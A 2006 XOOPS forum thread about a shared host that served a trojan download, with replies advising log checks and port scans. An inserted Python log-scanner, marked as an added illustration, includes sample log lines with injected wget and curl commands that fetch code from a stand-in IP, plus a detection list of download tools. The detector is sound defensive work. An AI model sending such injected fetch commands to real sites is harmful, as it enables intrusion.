1
cheywolf
Hacked host?
  • 2006/2/1 12:29

  • cheywolf

  • Just popping in

  • Posts: 7

  • Since: 2005/4/8 1


Okay, this creeped me out. I need to talk to somebody.

I have 7 XOOPS sites (2.0.13.1 - 2.2.4) hosted on a RoundBerry resellers account. Late yesterday afternoon, loading any page on any of these sites also started a download of the xpl.wmf trojan. Other than trying to infect my pc, the sites behaved themselves. Phplist (outside of XOOPS) did the same thing.

I contacted the admins and they said it was caused by a "dynamic module loading without apache". They removed this 'module' and all is well. Except for my wits. I'm not an apache wizard, but the admin's explanation is not comforting. I asked again and got the same answer.

Anyone know if there's a mod_spyware for apache?

2
seventhseal
Re: Hacked host?

Maybe this is not the case - but most hardware providers won't tell you the full truth...that being said, maybe yours is being pretty forthright.

More than likely, if your reseller account is on a shared system with other resellers, then there are probably a number of ports open that don't need to be OR should not be. Two groups have been very active lately in exploiting the open ports and submitting trojans - one out of France and one out of S. Africa. If you are really interested in what's going on, try logging in and seeing if you have authority to retrieve all ports and processes running. You might be surprised at what is really open.

The other thing to look for, go into each of your sites logs. You specifically want to find any "wget" strings that are being issued against your site. They are looking for overflows to occur. Okay - this statement is not meant to get anyone all balled up - but hosting companies love to blame CMS's for being so insecure that's how people hack in. IF, and this is a big IF, they were able to get in through an overflow and issue wget commands - then just identify the site, notify your provider, and get the holes plugged up.

Good Luck!
John Horne - a.k.a. - VelocityWebDev, Seventhseal, CreepingDeath
**********************************
VelocityWebDev Tech BLOG
VelocityWebHost Hosting and Design
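As an added illustration of the log check suggested above (this is not code from the thread or from XOOPS), the script below parses Apache combined-format access log lines, URL-decodes each request, and flags any whose URI or referer names a download tool such as wget. The log lines are constructed samples, and the tool list and regex are my own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache/NCSA combined log format; the quoted referer and user-agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Download tools commonly named in injected requests (assumed list).
FETCH_TOOLS = ("wget", "curl", "lynx", "fetch")

def decode(path, rounds=3):
    """Undo URL encoding repeatedly, since payloads are often double-encoded."""
    for _ in range(rounds):
        new = unquote(path)
        if new == path:
            break
        path = new
    return path

def find_fetch_attempts(log_text, tools=FETCH_TOOLS):
    """Return one dict per request whose decoded URI or referer names a fetch tool."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        haystack = decode(m["path"] + " " + (m["referer"] or "")).lower()
        for tool in tools:
            # Match the tool as a whole word so "curl" does not fire on "curly".
            if re.search(r'\b' + tool + r'\b', haystack):
                hits.append({"ip": m["ip"], "ts": m["ts"], "tool": tool,
                             "uri": decode(m["path"]), "status": m["status"]})
                break
    return hits

def offenders(hits):
    """Count hits per source IP so the noisiest source can be reported to the host."""
    return Counter(h["ip"] for h in hits)

# Constructed sample log lines (not from the poster's sites).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2006:15:02:11 -0500] "GET /modules/news/index.php?storyid=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2006:15:04:37 -0500] "GET /index.php?id=1;wget%20http://203.0.113.7/x HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
10.0.0.9 - - [01/Feb/2006:15:04:52 -0500] "GET /index.php?id=1;curl%2520http://203.0.113.7/x HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
10.0.0.7 - - [01/Feb/2006:15:05:01 -0500] "GET /modules/xoopsheadline/index.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for h in find_fetch_attempts(SAMPLE_LOG):
        print(h)
    print(offenders(find_fetch_attempts(SAMPLE_LOG)))
```

Run it against a real access_log by reading the file into `find_fetch_attempts`; a 200 status on a flagged request is the line worth sending to the provider.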

3
cheywolf
Re: Hacked host?
  • 2006/2/1 17:17

  • cheywolf

  • Just popping in

  • Posts: 7

  • Since: 2005/4/8 1


Quote:
seventhseal wrote:
Maybe this is not the case - but most hardware providers won't tell you the full truth...that being said, maybe your's is being pretty forthright.


I've been with RoundBerry for almost a year, and their tech support has, overall, been very good. I just get the feeling they're taking a CYA position.

Since I don't have telnet access to my account, I'll see what I can dig up in the logs. I appreciate your input. Thanks!

4
seventhseal
Re: Hacked host?

Sorry - what I meant was, they won't tell you because they are doing a CYA...!

If they give too many details, it could be used to exploit them if it gets out.

I'm surprised you don't have some type of telnet (bad) or SSH (good). Is it a windows platform? Linux?

Good luck!
John Horne - a.k.a. - VelocityWebDev, Seventhseal, CreepingDeath
**********************************
VelocityWebDev Tech BLOG
VelocityWebHost Hosting and Design

5
mawi27
Re: Hacked host?
  • 2006/2/1 18:48

  • mawi27

  • Friend of XOOPS

  • Posts: 103

  • Since: 2006/1/1 1


Quote:
cheywolf wrote:
Since I don't have telnet access to my account, I'll see what I can dig up in the logs. I appreciate your input. Thanks!


You can also try a portscan. There are several free tools and even websites offering to portscan an IP address.
Then you get an idea of possible attack sources.
Just google portscan + tcp ip ports to find websites to check what the heck these ports are good for (or even bad).

Marco
--
Match Dart!
Darts Ranking, News, Videos, Forum and more

6
cheywolf
Re: Hacked host?
  • 2006/2/1 19:57

  • cheywolf

  • Just popping in

  • Posts: 7

  • Since: 2005/4/8 1


It's a Linux host, and yes, they do advertise telnet/ssh access, but they've ignored two requests to grant access. I haven't pressed the issue. Sorry, I don't recall the error received the last time I tried to ssh in. (I'm at work and don't wanna try it from here.)

Right now, I'm inclined to trust that the admins are on top of things, though I might try a port scan. (Thanks, Marco!)

XOOPS... I'm lovin' it! And the spirit of the XOOPS community is great, too. Thanks for your help!

7
bb2120
Re: Hacked host?
  • 2006/2/1 20:11

  • bb2120

  • Not too shy to talk

  • Posts: 179

  • Since: 2005/7/6 1


Blue's port scanner (google it!) is great, though AVG antivirus picks it up as a hacking tool.... You could argue that I s'pose

8
cheywolf
Re: Hacked host?
  • 2006/2/2 1:38

  • cheywolf

  • Just popping in

  • Posts: 7

  • Since: 2005/4/8 1


Follow up: the ssh port is open on my host, but ssh is disabled: "Shell access is not enabled on your account!" I'll drop it so I don't cause my isp undue heartburn.

I used Mac's Network Utility to portscan my host, but only found a minimal set of the usual suspects. Nothing that looks dangerous.

Again, thanks for the advice.
